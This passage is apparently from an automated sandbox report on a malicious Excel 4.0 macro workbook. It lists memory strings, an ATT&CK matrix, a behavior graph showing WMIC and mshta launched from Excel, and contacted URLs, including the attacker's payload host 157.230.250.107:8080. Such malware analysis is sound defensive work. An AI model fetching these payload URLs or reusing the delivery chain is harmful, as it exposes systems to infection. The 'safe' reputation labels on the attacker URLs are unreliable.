      Source: EXCEL.EXE, 00000000.00000002.617645413.0000000002D70000.00000002.00020000.sdmp, mshta.exe, 00000015.00000002.617188130.000001E52A0C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: EXCEL.EXE, 00000000.00000002.617645413.0000000002D70000.00000002.00020000.sdmp, mshta.exe, 00000015.00000002.617188130.000001E52A0C0000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: EXCEL.EXE, 00000000.00000002.617645413.0000000002D70000.00000002.00020000.sdmp, mshta.exe, 00000015.00000002.617188130.000001E52A0C0000.00000002.00020000.sdmpBinary or memory string: &Program Manager
      Source: EXCEL.EXE, 00000000.00000002.617645413.0000000002D70000.00000002.00020000.sdmp, mshta.exe, 00000015.00000002.617188130.000001E52A0C0000.00000002.00020000.sdmpBinary or memory string: Progmanlock

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumNon-Standard Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting4Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution22Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection2NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting4LSA SecretsSystem Information Discovery4SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 532305 Sample: 08676789691.xlsm Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 29 Multi AV Scanner detection for submitted file 2->29 31 Found malicious Excel 4.0 Macro 2->31 33 Sigma detected: TA505 Dropper Load Pattern 2->33 35 8 other signatures 2->35 7 EXCEL.EXE 27 24 2->7         started        11 WmiPrvSE.exe 2->11         started        process3 file4 21 C:\Users\user\Desktop\~$08676789691.xlsm, data 7->21 dropped 23 C:\Users\user\...\08676789691.xlsm (copy), Microsoft 7->23 dropped 25 C:\ProgramData\SKZbt.rtf, HTML 7->25 dropped 37 Creates and opens a fake document (probably a fake document to hide exploiting) 7->37 13 WMIC.exe 1 7->13         started        16 mshta.exe 11->16         started        signatures5 process6 dnsIp7 39 Creates processes via WMI 13->39 19 conhost.exe 13->19         started        27 157.230.250.107, 49825, 8080 DIGITALOCEAN-ASNUS United States 16->27 signatures8 process9

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      08676789691.xlsm16%ReversingLabsDocument-Word.Trojan.Heuristic

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://fs.230.250.107:8080/0%Avira URL Cloudsafe
      http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf90%Avira URL Cloudsafe
      https://cdn.entity.0%URL Reputationsafe
      http://157.230.250.107:8080/mfkrmotherfucker0%Avira URL Cloudsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhR0%Avira URL Cloudsafe
      http://schemas.open0%URL Reputationsafe
      https://settings.outlook.comS0%Avira URL Cloudsafe
      https://api.aadrm.com/0%URL Reputationsafe
      http://157.230.250.107:8080/mfkrmot0%Avira URL Cloudsafe
      http://157.230.250.107:8080/mfkr0%Avira URL Cloudsafe
      http://157.230.250.107:8080/tf0%Avira URL Cloudsafe
      http://157.230.250.107:8080/n0%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://officeci.azurewebsites.net/api/0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhore0%Avira URL Cloudsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://api.onedrive.comcent0%Avira URL Cloudsafe
      https://substrate.office.coma0%Avira URL Cloudsafe
      https://substrate.office.com_0%Avira URL Cloudsafe
      https://substrate.office.come0%Avira URL Cloudsafe
      https://substrate.office.comc0%Avira URL Cloudsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://substrate.office.comP0%Avira URL Cloudsafe
      http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehx0%Avira URL Cloudsafe
      https://devnull.onenote.comMBI_SSL_SHORT0%Avira URL Cloudsafe
      https://wus2.contentsync.0%URL Reputationsafe
      http://157.230.250.107:8080/mfkrmotherfuckeru6y82sas40%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptioneventslJ0%Avira URL Cloudsafe
      https://api.diagnosticssdf.office.comK0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://login.windows.net/common/oauth2/authorizeRDEXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpfalse
        		high
        https://fs.230.250.107:8080/mshta.exe, 00000015.00000002.616453866.000001E529C64000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        		low
        https://insertmedia.bing.office.net/odc/insertmediacEXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpfalse
          		high
          http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9mshta.exe, 00000015.00000003.544339050.000001E529C6B000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616453866.000001E529C64000.00000004.00000020.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://shell.suite.office.com:1443EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
            		high
            https://autodiscover-s.outlook.com/EXCEL.EXE, EXCEL.EXE, 00000000.00000002.630070572.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536668437.0000000012E15000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.629731941.0000000012E0B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433290928.0000000012E15000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535829025.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429108675.0000000012E15000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
              		high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrEXCEL.EXE, 00000000.00000002.629522370.0000000012CF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                		high
                https://cdn.entity.7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                • URL Reputation: safe
                		unknown
                https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                  		high
                  https://login.windows.net/common/oauth2/authorizebEEXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpfalse
                    		high
                    http://157.230.250.107:8080/mfkrmotherfuckermshta.exe, 00000015.00000003.544394222.000001E529CC1000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://onedrive.live.com/embed?iaoEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                      		high
                      https://rpsticket.partnerservices.getmicrosoftkey.comEXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://lookup.onenote.com/lookup/geolocation/v1EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                        		high
                        http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhRmshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://clients.config.office.net/user/v1.0/android/policies-EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                          		high
                          https://login.windows.net/common/oauth2/authorizeAFEXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpfalse
                            		high
                            http://schemas.openEXCEL.EXE, 00000000.00000003.470229606.0000000015A74000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.469474716.0000000015BB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.469644138.0000000015C27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472175577.000000001590F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472166299.0000000015BB7000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                              		high
                              https://settings.outlook.comSEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                		high
                                https://api.aadrm.com/EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                • URL Reputation: safe
                                		unknown
                                http://157.230.250.107:8080/mfkrmotmshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://login.windows.net/common/oauth2/authorize6JSEXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpfalse
                                  		high
                                  http://157.230.250.107:8080/mfkrmshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://login.windows.net/common/oauth2/authorize$GAEXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpfalse
                                    		high
                                    http://157.230.250.107:8080/tfmshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesEXCEL.EXE, 00000000.00000002.630046251.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345579955.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429282809.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348419025.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536441529.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347932958.0000000012F22000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433606109.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345920900.0000000012F2A000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                      		high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppEXCEL.EXE, 00000000.00000002.629522370.0000000012CF0000.00000004.00000001.sdmpfalse
                                        		high
                                        https://api.microsoftstream.com/api/EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                          		high
                                          https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                            		high
                                            https://cr.office.comEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                              		high
                                              https://login.windows.net/common/oauth2/authorizecJEXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpfalse
                                                		high
                                                http://157.230.250.107:8080/nmshta.exe, 00000015.00000003.544313024.000001ED2C916000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://login.windows.net/common/oauth2/authorize;GPEXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://res.getmicrosoftkey.com/api/redemptionevents7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://tasks.office.com7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                    		high
                                                    https://login.windows.net/common/oauth2/authorizecom7KTEXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://officeci.azurewebsites.net/api/EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://login.windows.net/common/oauth2/authorizeN~EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://login.windows.net/common/oauth2/authorize$EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://login.windows.net/common/oauth2/authorizePFEXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13$EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://store.office.cn/addinstemplateEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                		high
                                                                http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhoremshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.odwebp.svc.ms7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://api.powerbi.com/v1.0/myorg/groupsEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                  		high
                                                                  https://web.microsoftstream.com/video/EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                    		high
                                                                    https://api.addins.store.officeppe.com/addinstemplate7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://graph.windows.netEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                      		high
                                                                      https://api.onedrive.comcentEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
